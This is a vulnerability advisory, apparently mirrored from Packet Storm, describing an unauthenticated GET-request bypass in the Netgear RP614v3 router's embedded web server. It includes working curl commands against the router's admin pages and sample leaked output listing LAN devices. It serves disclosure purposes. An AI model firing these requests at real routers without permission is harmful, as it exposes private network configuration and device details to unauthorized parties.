Lucene search
K

Netgear RP614v3 Authentication Bypass

🗓️ 06 Feb 2016 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 40 Views

Netgear RP614v3 N300 FW Authentication Bypass over LAN/WLA

Code
`###########################################  
Vendor : NETGEAR  
Product : RP614v3  
informed on : 12. 10. 2015  
responded : no  
fixed : no  
Effect : Remotely exploitable over LAN/WLAN  
Typ : Authentication Bypass  
Difficulty : trivial  
###########################################  
  
The N300 FW authentication bypass inspired me to check my rp614v3 router  
and I found this bypass:  
  
Firmware: *Firmwareversion* V6.0GR Oct 26 2004 ( which seems to be the  
lastest )  
  
It's an old model, but it's still in operation with ADSL2 connections  
like TCOM DSL6000 in Germany.  
  
How it works:  
  
If you use a normal browser, it sends a *HEAD*, followed by a GET, to  
the router first, which gets a 403 Forbidden back:  
  
# curl -I "http://192.168.1.1/contents1.html"  
HTTP/1.0 403 Forbidden  
  
this was expected and is the valid answere, but if you send a *GET*  
instead of the HEAD and your not authenticated,  
you get the 200 back :  
  
# curl -i "http://192.168.1.1/contents1.html"  
HTTP/1.0 200 OK  
Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.  
Content-length: 7158  
Accept-ranges: bytes  
Content-type: text/html  
  
<html>  
<head>  
<meta http-equiv="content-type" content="text/html;charset=windows-1252">  
<meta name="generator" content="Adobe GoLive 5">  
...  
  
Works for every page, with all informations disclosed the router has to  
offer. No password nor a username needed.  
  
Example :  
  
#curl -i "http://192.168.1.1/lanform.html"  
HTTP/1.0 200 OK  
Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.  
Content-length: 13722  
Accept-ranges: bytes  
Content-type: text/html  
....  
<table border ="1" cellpadding ="0" cellspacing ="0" width="100%">  
<tr>  
<td nowrap width="5%" align="center">  
<span class="thead">�</span> </td>  
<td nowrap width="3%" align="center">  
<span class="thead">#</span> </td>  
<td nowrap width="24%" align="center">  
<span class="thead">IP-Adresse</span> </td>  
<td nowrap width="34%" align="center">  
<span class="thead">Ger�tename</span> </td>  
<td nowrap width="34%" align="center">  
<span class="thead">MAC-Adresse</span> </td>  
</tr>  
<tr><td nowrap width="5%" align="center"><input type="radio" value="0"  
checked name="X1" onClick="check(this.value)"></td><td nowrap width="3%"  
align="center">1</td><td nowrap width="24%"  
align="center">*192.168.1.2*</td><td nowrap width="34%"  
align="center">LapTop</td><td nowrap width="34%"  
align="center">*00:15:a5:d5:f7:7c*</td></tr><tr><td nowrap width="5%"  
align="center"><input type="radio" value="1" name="X1"  
onClick="check(this.value)"></td><td nowrap width="3%"  
align="center">2</td><td nowrap width="24%"  
align="center">*192.168.1.3*</td><td nowrap width="34%"  
align="center">Accesspoint</td><td nowrap width="34%"  
align="center">*21:6e:5c:23:86:a2*</td></tr> </table>  
  
(all ips and mac have been changed )  
  
Sidenote:  
  
As it's a problem of the underlying httpd server from "Delta Networks  
Inc." , it's most likely to be effecting all dsl router products using  
that same version of the httpd.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation